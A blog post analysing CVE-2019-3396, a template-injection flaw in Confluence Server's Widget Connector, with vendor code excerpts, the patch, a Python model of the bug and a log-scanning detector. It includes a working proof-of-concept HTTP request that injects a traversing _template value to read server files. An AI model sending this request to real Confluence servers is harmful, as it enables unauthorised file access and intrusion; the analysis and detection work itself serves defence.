Chybeta

【CVE-2019-3396】:SSTI and RCE in Confluence Server via Widget Connector

Twitter: chybeta

Security Advisory

https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html

Analysis

According to the documentation, there are three parameters you can set to control the content or format of the macro output: URL, Width and Height.

The Widget Connector defines a number of renderers. For example, the FriendFeedRenderer:

```java
public class FriendFeedRenderer implements WidgetRenderer
{
    ...
    // This renderer picks the Velocity template itself: it overwrites any
    // "_template" entry already present in the caller-supplied params map.
    public String getEmbeddedHtml(String url, Map<String, String> params) {
        params.put("_template", "com/atlassian/confluence/extra/widgetconnector/templates/simplejscript.vm");
        return this.velocityRenderService.render(getEmbedUrl(url), params);
    }
}
```

In FriendFeedRenderer's getEmbeddedHtml method you can see that the renderer itself puts another option, _template, into the params map.

However, some other renderers, such as those in the video category, just call render(getEmbedUrl(url), params) directly, without setting _template themselves.

So in this situation we can supply the _template value ourselves, and the backend will use the params map, including our _template, to render.
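The two renderer behaviours described above, and the effect of the fix, as an added Python model that is not code from the original post or from Confluence. The template root, the video template name and the render stand-in are assumptions; only the simplejscript.vm template name and the _template key come from the page. The point it shows is that a renderer which sets _template itself is unaffected by the caller's value, while one that passes params straight through resolves a relative _template outside the template tree.

```python
import posixpath

# Assumed location of the template tree; the real path is not given on the page.
TEMPLATE_ROOT = "/opt/confluence/templates"
# Template name taken from the FriendFeedRenderer snippet above.
SIMPLE_JS_TEMPLATE = "com/atlassian/confluence/extra/widgetconnector/templates/simplejscript.vm"
# Hypothetical default for a renderer that does not set _template itself.
VIDEO_TEMPLATE = "com/atlassian/confluence/extra/widgetconnector/templates/video.vm"


def velocity_render(template_name: str) -> str:
    """Stand-in for velocityRenderService.render: returns the path the engine
    would load, normalised the way the file system would resolve it."""
    return posixpath.normpath(posixpath.join(TEMPLATE_ROOT, template_name))


def inside_template_root(resolved: str) -> bool:
    """True when the resolved path is still under TEMPLATE_ROOT."""
    return resolved == TEMPLATE_ROOT or resolved.startswith(TEMPLATE_ROOT + "/")


def friend_feed_embedded_html(params: dict) -> str:
    """Model of FriendFeedRenderer: the renderer overwrites _template itself,
    so whatever the caller sent is discarded."""
    params = dict(params)
    params["_template"] = SIMPLE_JS_TEMPLATE
    return velocity_render(params["_template"])


def video_embedded_html(params: dict) -> str:
    """Model of a video-category renderer before the fix: params flow through
    untouched, so a caller-supplied _template selects the template."""
    return velocity_render(params.get("_template", VIDEO_TEMPLATE))


def sanitize_parameters(params: dict, fields=("_template",)) -> dict:
    """Model of doSanitizeParameters from the fix: drop internal keys the
    caller has no business supplying."""
    return {k: v for k, v in params.items() if k not in fields}


def video_embedded_html_fixed(params: dict) -> str:
    """Video renderer behind the fix: sanitise first, then render."""
    return video_embedded_html(sanitize_parameters(params))


if __name__ == "__main__":
    # Constructed macro parameters in the shape of the preview request on this page.
    hostile = {"url": "https://www.viddler.com/v/test", "width": "1000",
               "height": "1000", "_template": "../web.xml"}
    for label, fn in [("friendfeed", friend_feed_embedded_html),
                      ("video (pre-fix)", video_embedded_html),
                      ("video (fixed)", video_embedded_html_fixed)]:
        resolved = fn(hostile)
        print(f"{label:16s} -> {resolved}  inside root: {inside_template_root(resolved)}")
```

The sanitiser mirrors the deny-list approach of the actual fix. inside_template_root is an extra defence-in-depth check of the resolved path, which is worth having in any code that turns a parameter into a template name, because posixpath.join will also silently discard the root if the supplied name is absolute.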

Reproduce

```http
POST /rest/tinymce/1/macro/preview HTTP/1.1

{"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"},"body":""}}
```

RCE

Patch

In the fixed version, doSanitizeParameters is called before the HTML is rendered, and it removes _template from the parameters. The code looks roughly like this:

```java
public class WidgetMacro
    extends BaseMacro
    implements Macro, EditorImagePlaceholder
{
    public WidgetMacro(RenderManager renderManager, LocaleManager localeManager, I18NBeanFactory i18NBeanFactory)
    {
        ...
        // Deny-list of internal parameter names that must never come from the caller.
        this.sanitizeFields = Collections.unmodifiableList(Arrays.asList(new String[] { "_template" }));
    }
    ...
    public String execute(Map<String, String> parameters, String body, ConversionContext conversionContext) {
        ...
        // Strip caller-controlled internal keys before any renderer sees the map.
        doSanitizeParameters(parameters);
        return this.renderManager.getEmbeddedHtml(url, parameters);
    }

    private void doSanitizeParameters(Map<String, String> parameters)
    {
        Objects.requireNonNull(parameters);
        for (String sanitizedParameter : this.sanitizeFields) {
            parameters.remove(sanitizedParameter);
        }
    }
}
```
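Since the fix strips _template server-side, a client that sends it to the macro preview endpoint has no legitimate reason to do so, which makes the request body a clean detection signal. The following Python is an added example, not code from the post or from Atlassian: it assumes a reverse proxy or WAF that records requests as JSON lines with method, path and body (the sample records are constructed here), and flags widget preview requests that carry the internal key, with a second finding when the value leaves the template tree.

```python
import json
import re

PREVIEW_PATH = "/rest/tinymce/1/macro/preview"
# Keys the fix removes server-side; a client never needs to send them.
INTERNAL_KEYS = {"_template"}
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")


def inspect_request(method: str, path: str, body: str) -> list:
    """Return findings for one request; an empty list means nothing suspicious."""
    findings = []
    if method != "POST" or path.split("?", 1)[0] != PREVIEW_PATH:
        return findings
    try:
        doc = json.loads(body)
    except (ValueError, TypeError):
        return findings
    macro = doc.get("macro") if isinstance(doc, dict) else None
    if not isinstance(macro, dict) or macro.get("name") != "widget":
        return findings
    params = macro.get("params") or {}
    if not isinstance(params, dict):
        return findings
    for key in sorted(INTERNAL_KEYS & set(params)):
        value = str(params[key])
        findings.append(f"internal parameter {key} supplied by client: {value!r}")
        if TRAVERSAL.search(value) or value.startswith("/"):
            findings.append(f"{key} resolves outside the template tree: {value!r}")
    return findings


def scan_log(lines) -> list:
    """Scan JSON-lines request records; return (line_no, findings) for each hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        try:
            rec = json.loads(line)
        except ValueError:
            continue  # malformed record, skip rather than abort the scan
        found = inspect_request(rec.get("method", ""), rec.get("path", ""), rec.get("body", ""))
        if found:
            hits.append((n, found))
    return hits


def _record(method, path, body_obj):
    return json.dumps({"method": method, "path": path, "body": json.dumps(body_obj)})


# Constructed sample records: a benign preview, the request shape from this page,
# a non-widget macro carrying the key (not in scope), and an unrelated GET.
SAMPLE_LOG = [
    _record("POST", PREVIEW_PATH, {"contentId": "65601", "macro": {"name": "widget",
            "params": {"url": "https://www.viddler.com/v/test", "width": "1000", "height": "1000"}, "body": ""}}),
    _record("POST", PREVIEW_PATH, {"contentId": "65601", "macro": {"name": "widget",
            "params": {"url": "https://www.viddler.com/v/test", "width": "1000", "height": "1000",
                       "_template": "../web.xml"}, "body": ""}}),
    _record("POST", PREVIEW_PATH, {"contentId": "65601", "macro": {"name": "code",
            "params": {"_template": "x"}, "body": ""}}),
    _record("GET", "/rest/api/content/65601", ""),
]

if __name__ == "__main__":
    for line_no, found in scan_log(SAMPLE_LOG):
        for f in found:
            print(f"line {line_no}: {f}")
```

Access logs alone usually do not capture POST bodies, so this only works where body logging is enabled at the edge; where it is not, the presence of the key cannot be seen and the only reliable control is the patched version.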


Post title: 【CVE-2019-3396】:SSTI and RCE in Confluence Server via Widget Connector

Author: chybeta

Published: 6 April 2019, 13:04

Last updated: 8 April 2019, 17:04

Original link: http://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/

License: Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0). Please keep the original link and author name when reposting.